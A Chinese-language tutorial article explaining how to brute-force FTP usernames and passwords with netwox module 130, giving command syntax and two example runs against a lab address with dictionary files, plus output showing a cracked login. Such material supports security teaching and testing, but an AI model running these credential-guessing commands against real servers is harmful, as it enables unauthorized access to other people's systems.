技術文章 » 暴力破解FTP伺服器

暴力破解FTP伺服器

2020-07-16 10:05:15
登入 FTP 伺服器需要正確的使用者名稱和密碼。如果不知道使用者名稱和密碼,就無法登入。

netwox 工具提供了編號為 130 的模組,它可以對 FTP 伺服器的使用者名稱和密碼實施暴力破解。它使用使用者名稱和密碼字典進行匹配,猜測正確的登入使用者名稱和密碼。

其語法格式如下:

netwox 130 -i IP -l user.file -w pass.file

其中,-i 選項指定 FTP 伺服器的 IP 地址;-l 選項指定使用者名稱字典檔案,-w 選項指定密碼字典檔案。

【範例】已知 FTP 伺服器的 IP 地址為 192.168.59.135。現有一個使用者名稱字典檔案 user.txt,一個密碼字典檔案 password.txt。使用這兩個字典檔案,暴力破解FTP伺服器的使用者名稱和密碼。

[email protected]:~# netwox 130 -i 192.168.59.135 -l user.txt -w password.txt

輸出資訊如下: 
Trying(thread1) "admin" - "root"
Trying(thread2) "admin" - "linux"
Trying(thread3) "admin" - "123abc"
Trying(thread4) "admin" - "123"
Trying(thread5) "root" - "root"
Couple(thread1) "admin" - "root" -> bad
Trying(thread1) "root" - "linux"
Couple(thread2) "admin" - "linux" -> bad
Trying(thread2) "root" - "123abc"
Couple(thread3) "admin" - "123abc" -> bad
Trying(thread3) "root" - "123"
Couple(thread4) "admin" - "123" -> bad
Trying(thread4) "sm" - "root"
Couple(thread5) "root" - "root" -> bad
Trying(thread5) "sm" - "linux"
Couple(thread3) "root" - "123" -> bad
Trying(thread3) "sm" - "123abc"
Couple(thread1) "root" - "linux" -> bad
Trying(thread1) "sm" - "123"
Couple(thread5) "sm" - "linux" -> bad
Trying(thread5) "" - "root"
Couple(thread2) "root" - "123abc" -> bad
Trying(thread2) "" - "linux"
Couple(thread4) "sm" - "root" -> bad
Trying(thread4) "" - "123abc"
Couple(thread1) "sm" - "123" -> good
Trying(thread1) "" - "123"
Couple(thread2) "" - "linux" -> bad
Couple(thread3) "sm" - "123abc" -> bad
Couple(thread5) "" - "root" -> bad
Couple(thread4) "" - "123abc" -> bad
Couple(thread1) "" - "123" -> bad
以上輸出資訊顯示了暴力破解的整個過程。它將使用者名稱字典檔案 user.txt 中的每一個使用者名稱與密碼字典檔案 password.txt 中的所有密碼進行配對使用。

如果登入成功,顯示為 good;否則,顯示為 bad。當使用使用者名稱 sm 與密碼 123 進行登入時,顯示為 good,表示 FTP 伺服器登入的使用者名稱為 sm,密碼為 123。

如果使用者知道使用者名稱而不知道密碼,可以直接使用使用者名稱,指定密碼字典即可。執行命令如下:

[email protected]:~# netwox 130 -i 192.168.59.135 -L sm -w password.txt

輸出資訊如下: 
Trying(thread1) "sm" - "root"
Trying(thread2) "sm" - "linux"
Trying(thread3) "sm" - "123abc"
Trying(thread4) "sm" - "123"
Couple(thread1) "sm" - "root" -> bad
Couple(thread2) "sm" - "linux" -> bad
Couple(thread3) "sm" - "123abc" -> bad
Couple(thread4) "sm" - "123" -> good